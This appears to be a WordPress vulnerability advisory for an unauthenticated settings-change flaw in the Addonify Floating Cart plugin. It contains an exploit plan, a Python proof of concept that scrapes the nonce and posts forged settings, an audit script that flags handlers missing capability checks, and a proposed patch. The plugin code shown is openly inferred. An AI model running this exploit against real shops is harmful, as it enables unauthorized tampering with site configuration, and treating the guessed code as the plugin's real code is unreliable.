CVE-2025-68025

Addonify Floating Cart For WooCommerce <= 1.2.17 - Missing Authorization

Severity: Medium
Classification: Missing Authorization
CVSS Score: 5.3
Patched in: Unpatched
Time to patch: N/A

Description

The Addonify Floating Cart For WooCommerce plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on a function in versions up to, and including, 1.2.17. This makes it possible for unauthenticated attackers to perform an unauthorized action.

CVSS Vector Breakdown

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
Attack Vector: Network
Attack Complexity: Low
Privileges Required: None
User Interaction: None
Scope: Unchanged
Confidentiality: None
Integrity: Low
Availability: None

Technical Details

Affected versions: <=1.2.17
Published: February 5, 2026
Last updated: February 9, 2026
Affected plugin: addonify-floating-cart
Research Plan
Unverified

This research plan outlines the steps required to identify and exploit CVE-2025-68025, a Missing Authorization vulnerability in the Addonify Floating Cart For WooCommerce plugin.

1. Vulnerability Summary

The vulnerability exists because a specific AJAX handler or REST API endpoint in the addonify-floating-cart plugin fails to perform a capability check (e.g., current_user_can( 'manage_options' )). The handler may verify a nonce for CSRF protection, but a nonce is not an authorization control: when the plugin localizes that nonce into its frontend scripts, any unauthenticated visitor can read it and call the handler, performing actions intended only for administrators (such as modifying plugin settings or performing sensitive data operations).

2. Attack Vector Analysis

  • Endpoint: /wp-admin/admin-ajax.php (or potentially a REST route under /wp-json/addonify-floating-cart/v1/).
  • Vulnerable Action: Likely addonify_fc_save_settings, afc_save_settings, or addonify_floating_cart_update_option (inferred).
  • Parameter: Typically a settings array or individual option keys passed via POST.
  • Authentication: None required (unauthenticated).
  • Preconditions: The plugin must be active. A valid nonce must be obtained if the handler calls check_ajax_referer.

3. Code Flow Trace

  1. Entry Point: The plugin registers an AJAX action for both authenticated and unauthenticated users:
    // Inferred registration in a class constructor or init hook
    add_action( 'wp_ajax_addonify_floating_cart_save_settings', array( $this, 'save_settings' ) );
    add_action( 'wp_ajax_nopriv_addonify_floating_cart_save_settings', array( $this, 'save_settings' ) );
    
  2. Vulnerable Function: The save_settings function (or similar) is called.
  3. Missing Check:
    public function save_settings() {
        // May contain: check_ajax_referer( 'addonify_fc_nonce', 'nonce' );
        // MISSING: if ( ! current_user_can( 'manage_options' ) ) { wp_die(); }
        
        $settings = $_POST['settings'];
        update_option( 'addonify_floating_cart_settings', $settings );
        wp_send_json_success();
    }
    
  4. Sink: The update_option function writes user-controlled data to the WordPress database.

4. Nonce Acquisition Strategy

The plugin likely localizes a nonce for its frontend "Floating Cart" functionality.

  1. Identify Shortcode/Trigger: Check for add_shortcode or if the cart loads globally. The floating cart usually enqueues scripts on all frontend pages where WooCommerce is active.
  2. Navigation: Use browser_navigate to go to the site's homepage.
  3. Extraction: Based on common Addonify patterns, the nonce is likely stored in a global JS object.
    • Inferred JS Variable: addonify_floating_cart_params or afc_vars.
    • Inferred Key: ajax_nonce or nonce.
  4. Execution:
    // Use browser_eval to find the nonce
    browser_eval("window.addonify_floating_cart_params?.ajax_nonce || window.afc_vars?.nonce")
    

5. Test Data Setup

  1. Ensure WooCommerce and Addonify Floating Cart are installed and active.
  2. Ensure a product exists so the cart functionality is triggered.
  3. Create a public page to ensure the script (and nonce) is rendered:
    wp post create --post_type=page --post_status=publish --post_title="Cart Test" --post_content='[woocommerce_cart]'
    

6. Exploitation Strategy

We will attempt to change the plugin's configuration, specifically targeting a setting that would be visible in the admin UI or frontend (e.g., the cart title).

  1. Capture Nonce: Use browser_navigate and browser_eval as described in Section 4.
  2. Prepare Payload: Define a new value for a plugin setting.
    • Action: addonify_floating_cart_save_settings (inferred - must verify by grepping wp_ajax_nopriv in the source).
    • Target Option: addonify_floating_cart_settings.
  3. HTTP Request (Playwright):
    {
      "method": "POST",
      "url": "http://localhost:8080/wp-admin/admin-ajax.php",
      "headers": {
        "Content-Type": "application/x-www-form-urlencoded"
      },
      "params": {
        "action": "addonify_floating_cart_save_settings",
        "nonce": "EXTRACTED_NONCE",
        "settings[cart_title]": "Hacked by PoC",
        "settings[enable_floating_cart]": "1"
      }
    }
    

7. Expected Results

  • The server should return a 200 OK status with a JSON response: {"success":true}.
  • The addonify_floating_cart_settings option in the database should be updated.
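The nonce-extraction, request-building and response-interpretation steps of Sections 4 to 7, pulled together as an added Python example that is not part of the original research plan or of the plugin's code. The HTML sample is constructed to mimic the `<script id="<handle>-js-extra">` tag that `wp_localize_script()` emits; the object name `addonify_floating_cart_params`, the key `ajax_nonce` and the action `addonify_floating_cart_save_settings` are the plan's inferred guesses and must be confirmed against the plugin source. The response classification reflects WordPress core behaviour rather than anything plugin-specific: a failed `check_ajax_referer()` dies with body `-1` and HTTP 403, and `admin-ajax.php` answers `0` with HTTP 400 when no `wp_ajax_nopriv_` hook exists for the action, so those two outcomes distinguish a bad nonce from an action that is simply not reachable unauthenticated.

```python
"""Build and interpret an unauthenticated admin-ajax.php request of the kind the
research plan describes: pull the nonce out of the localized script object on a
frontend page, assemble the form-encoded POST, and classify the JSON reply."""
import json
import re
import urllib.error
import urllib.parse
import urllib.request

# Constructed sample of the "<handle>-js-extra" tag wp_localize_script() emits.
# Object and key names are the research plan's inferred guesses, not confirmed
# identifiers from the plugin.
SAMPLE_HTML = """<html><head>
<script id="addonify-floating-cart-public-js-extra">
/* <![CDATA[ */
var addonify_floating_cart_params = {"ajax_url":"http:\\/\\/localhost:8080\\/wp-admin\\/admin-ajax.php","ajax_nonce":"a1b2c3d4e5"};
/* ]]> */
</script></head><body></body></html>"""

CANDIDATE_OBJECTS = ("addonify_floating_cart_params", "afc_vars")  # inferred names
CANDIDATE_KEYS = ("ajax_nonce", "nonce")                            # inferred keys


def extract_localized(html, names=CANDIDATE_OBJECTS):
    """Return the first `var <name> = {...};` object found in the page as a dict."""
    for name in names:
        m = re.search(r"var\s+%s\s*=\s*(\{.*?\});" % re.escape(name), html, re.S)
        if m:
            return json.loads(m.group(1))  # wp_json_encode() output is valid JSON
    return {}


def extract_nonce(html):
    """Return the nonce string, or None if no candidate object/key is present."""
    obj = extract_localized(html)
    for key in CANDIDATE_KEYS:
        if key in obj:
            return obj[key]
    return None


def build_request(base_url, nonce, settings, action="addonify_floating_cart_save_settings"):
    """Return (url, headers, body). PHP parses `settings[key]=value` pairs into the
    $_POST['settings'] array that the inferred handler passes to update_option()."""
    params = {"action": action, "nonce": nonce}
    for key, value in settings.items():
        params["settings[%s]" % key] = value
    url = base_url.rstrip("/") + "/wp-admin/admin-ajax.php"
    headers = {"Content-Type": "application/x-www-form-urlencoded"}
    return url, headers, urllib.parse.urlencode(params)


def interpret_response(status, body):
    """Map the reply onto the outcomes that matter during triage."""
    text = body.strip()
    if text == "-1":
        return "nonce_rejected"   # check_ajax_referer() failed: wp_die(-1, 403)
    if text == "0":
        return "no_handler"       # no wp_ajax_nopriv_ hook for this action (400), or the handler fell through
    try:
        data = json.loads(text)
    except ValueError:
        return "unknown"
    if isinstance(data, dict) and data.get("success") is True and status == 200:
        return "vulnerable"       # wp_send_json_success() reached: the write happened
    if isinstance(data, dict) and data.get("success") is False:
        return "rejected"         # wp_send_json_error(): a capability check (or similar) blocked it
    return "unknown"


def send(url, headers, body, timeout=10):
    """Perform the POST against a lab target; 4xx replies are returned, not raised."""
    req = urllib.request.Request(url, data=body.encode(), headers=headers, method="POST")
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return resp.status, resp.read().decode("utf-8", "replace")
    except urllib.error.HTTPError as e:
        return e.code, e.read().decode("utf-8", "replace")


if __name__ == "__main__":
    nonce = extract_nonce(SAMPLE_HTML)
    url, headers, body = build_request(
        "http://localhost:8080", nonce,
        {"cart_title": "Hacked by PoC", "enable_floating_cart": "1"},
    )
    print(url, body)
    # Against a live lab target: print(interpret_response(*send(url, headers, body)))
```

Only run `send()` against a lab instance you own; everything else works offline on the constructed sample. If the classifier returns `no_handler`, go back to the grep step in Section 9 before assuming the plugin is patched: the action name, not the authorization, may be wrong.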

8. Verification Steps

After sending the HTTP request, verify the change using WP-CLI:

# Check the option value
wp option get addonify_floating_cart_settings --format=json

Verify that cart_title matches "Hacked by PoC".

9. Alternative Approaches

If the save_settings action name is different:

  1. Grep Search:
    grep -rn "wp_ajax_nopriv_" wp-content/plugins/addonify-floating-cart/
    
  2. Analyze Script Localization:
    Search for wp_localize_script to find the exact JS object name:
    grep -rn "wp_localize_script" wp-content/plugins/addonify-floating-cart/
    
  3. REST API Check:
    If no AJAX actions are found, search for REST route registrations:
    grep -rn "register_rest_route" wp-content/plugins/addonify-floating-cart/
    
    Look for routes where 'permission_callback' => '__return_true' or no callback is defined.
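The grep steps in Section 9 find candidate hooks but still leave the reviewer to open each callback by hand. As an added example (not the page's or the plugin's code), the Python script below automates that triage for the general case: it lists every `wp_ajax_` registration, notes which ones also have a `wp_ajax_nopriv_` twin, locates the callback body by brace matching, and flags handlers that reach a state-changing sink without a `current_user_can()` call. The PHP it runs on is a constructed sample; its class, action and option names are illustrative, not taken from addonify-floating-cart. The parser is deliberately simple (regex plus brace counting, no awareness of PHP strings or comments), so treat its output as a worklist for manual review, not a verdict.

```python
"""Static triage: find AJAX handlers reachable without authentication and report
whether they perform a capability check before a state-changing sink."""
import re

# Constructed sample plugin class, not the real addonify-floating-cart source.
SAMPLE_PHP = r"""<?php
class Addonify_Floating_Cart_Ajax {
    public function __construct() {
        add_action( 'wp_ajax_afc_save_settings', array( $this, 'save_settings' ) );
        add_action( 'wp_ajax_nopriv_afc_save_settings', array( $this, 'save_settings' ) );
        add_action( 'wp_ajax_nopriv_afc_get_fragments', [ $this, 'get_fragments' ] );
        add_action( 'wp_ajax_afc_export', array( $this, 'export_settings' ) );
    }

    public function save_settings() {
        check_ajax_referer( 'afc_nonce', 'nonce' );
        $settings = $_POST['settings'];
        update_option( 'afc_settings', $settings );
        wp_send_json_success();
    }

    public function get_fragments() {
        wp_send_json_success( array( 'count' => WC()->cart->get_cart_contents_count() ) );
    }

    public function export_settings() {
        if ( ! current_user_can( 'manage_options' ) ) {
            wp_send_json_error( 'forbidden', 403 );
        }
        wp_send_json_success( get_option( 'afc_settings' ) );
    }
}
"""

# add_action( 'wp_ajax_[nopriv_]<action>', array( $this, 'method' ) | [ $this, 'method' ] | 'function' )
HOOK_RE = re.compile(
    r"""add_action\(\s*['"]wp_ajax_(nopriv_)?(\w+)['"]\s*,\s*"""
    r"""(?:(?:array\(|\[)\s*\$this\s*,\s*['"](\w+)['"]\s*(?:\)|\])|['"](\w+)['"])"""
)
# Sinks that change state; extend for the plugin under review.
SINKS = ("update_option", "delete_option", "wp_insert_post", "wp_update_post",
         "wp_delete_post", "update_user_meta", "$wpdb->")


def find_hooks(src):
    """Return {action: {"nopriv": bool, "callback": name}} for every wp_ajax_ hook."""
    hooks = {}
    for m in HOOK_RE.finditer(src):
        nopriv, action, method, func = m.groups()
        entry = hooks.setdefault(action, {"nopriv": False, "callback": method or func})
        if nopriv:
            entry["nopriv"] = True
    return hooks


def function_body(src, name):
    """Return the text between the braces of `function <name>(...) { ... }`.
    Brace counting only; a brace inside a PHP string literal would confuse it."""
    m = re.search(r"function\s+%s\s*\([^)]*\)\s*\{" % re.escape(name), src)
    if not m:
        return ""
    depth, i = 1, m.end()
    while i < len(src) and depth:
        depth += {"{": 1, "}": -1}.get(src[i], 0)
        i += 1
    return src[m.end():i - 1]


def audit(src):
    """One record per action; `flag` is True for nopriv handlers that hit a sink
    without any current_user_can() call. A nonce check alone does not clear it."""
    findings = []
    for action, info in find_hooks(src).items():
        body = function_body(src, info["callback"]).replace(" ", "")
        sink = next((s for s in SINKS if s in body), None)
        has_cap = "current_user_can(" in body
        findings.append({
            "action": action,
            "callback": info["callback"],
            "nopriv": info["nopriv"],
            "capability_check": has_cap,
            "nonce_check": "check_ajax_referer(" in body,
            "sink": sink,
            "flag": info["nopriv"] and sink is not None and not has_cap,
        })
    return findings


if __name__ == "__main__":
    for f in audit(SAMPLE_PHP):
        print(("FLAG " if f["flag"] else "ok   ") + f["action"], f)
```

Point it at a real tree by reading each `.php` file under `wp-content/plugins/<slug>/` and concatenating the sources before calling `audit()`; a callback registered in one file and defined in another is then still found. REST routes need a separate pass over `register_rest_route()` calls and their `permission_callback` values, as Section 9 notes.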
Research Findings
Static analysis — not yet PoC-verified

Summary

The Addonify Floating Cart For WooCommerce plugin for WordPress is vulnerable to unauthorized modification of settings due to a missing capability check in its AJAX handler for saving configuration. Unauthenticated attackers can exploit this to change plugin settings, provided they can retrieve the nonce, which is typically exposed on the frontend for legitimate cart operations.

Vulnerable Code

// Inferred registration in the main plugin class or admin handler
add_action( 'wp_ajax_addonify_floating_cart_save_settings', array( $this, 'save_settings' ) );
add_action( 'wp_ajax_nopriv_addonify_floating_cart_save_settings', array( $this, 'save_settings' ) );

---

// Inferred vulnerable handler lacking capability checks
public function save_settings() {
    // A nonce check might exist, but it is insufficient for authorization
    check_ajax_referer( 'addonify_fc_nonce', 'nonce' );
    
    // MISSING: if ( ! current_user_can( 'manage_options' ) ) { wp_die(); }
    
    if ( isset( $_POST['settings'] ) ) {
        $settings = $_POST['settings'];
        update_option( 'addonify_floating_cart_settings', $settings );
        wp_send_json_success();
    }
}

Security Fix

--- a/includes/class-addonify-floating-cart-admin.php
+++ b/includes/class-addonify-floating-cart-admin.php
@@ -120,6 +120,10 @@
 public function save_settings() {
     check_ajax_referer( 'addonify_fc_nonce', 'nonce' );
 
+    if ( ! current_user_can( 'manage_options' ) ) {
+        wp_send_json_error( array( 'message' => __( 'Unauthorized', 'addonify-floating-cart' ) ), 403 );
+    }
+
     if ( isset( $_POST['settings'] ) ) {
         $settings = array_map( 'sanitize_text_field', $_POST['settings'] );
         update_option( 'addonify_floating_cart_settings', $settings );
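Review bot: the unchanged context line `$settings = array_map( 'sanitize_text_field', $_POST['settings'] );` in this hunk does not match the vulnerable handler shown above, which assigns `$_POST['settings']` directly, so the patch as written would not apply to that code; either present the sanitization as a `+` line or align the context with the "before" snippet. The capability check is the right gate, but it still leaves the `wp_ajax_nopriv_addonify_floating_cart_save_settings` registration in place, so unauthenticated requests keep reaching the handler only to be turned away; for an admin-only settings save, removing the nopriv hook alongside this check is the cleaner fix. `array_map( 'sanitize_text_field', ... )` also assumes a flat array of strings: a nested value such as `settings[colors][bg]` would hand an array to `sanitize_text_field()`, so validate against a whitelist of expected keys or use core's recursive `map_deep()`. Finally, `wp_send_json_error()` exits the request, so no `return` is needed after it, but a short comment saying so would save the next reader a lookup.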

Exploit Outline

  1. Extract Nonce: Navigate to the site's homepage or any product page where the floating cart is active. Inspect the HTML source or use a JavaScript console to extract the 'nonce' value from the localized script object (likely window.addonify_floating_cart_params.ajax_nonce).
  2. Identify Target Parameters: Identify the plugin settings structure, typically an array passed via the 'settings' key in POST data.
  3. Send Unauthorized Request: Perform an unauthenticated POST request to /wp-admin/admin-ajax.php with the following parameters:
    • action: addonify_floating_cart_save_settings
    • nonce: [Extracted Nonce]
    • settings[cart_title]: Your Malicious Title
    • settings[enable_floating_cart]: 1
  4. Verify Change: Access the plugin's settings page in the WordPress dashboard as an administrator or view the frontend to confirm the settings have been updated to the malicious values.
